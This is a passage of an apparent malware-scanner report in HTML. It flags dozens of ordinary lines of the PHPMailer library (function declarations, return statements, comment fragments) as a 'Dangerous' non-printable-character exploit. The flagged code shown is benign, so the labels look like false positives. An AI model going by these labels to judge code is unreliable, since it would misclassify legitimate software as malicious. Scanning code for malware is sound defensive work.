</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
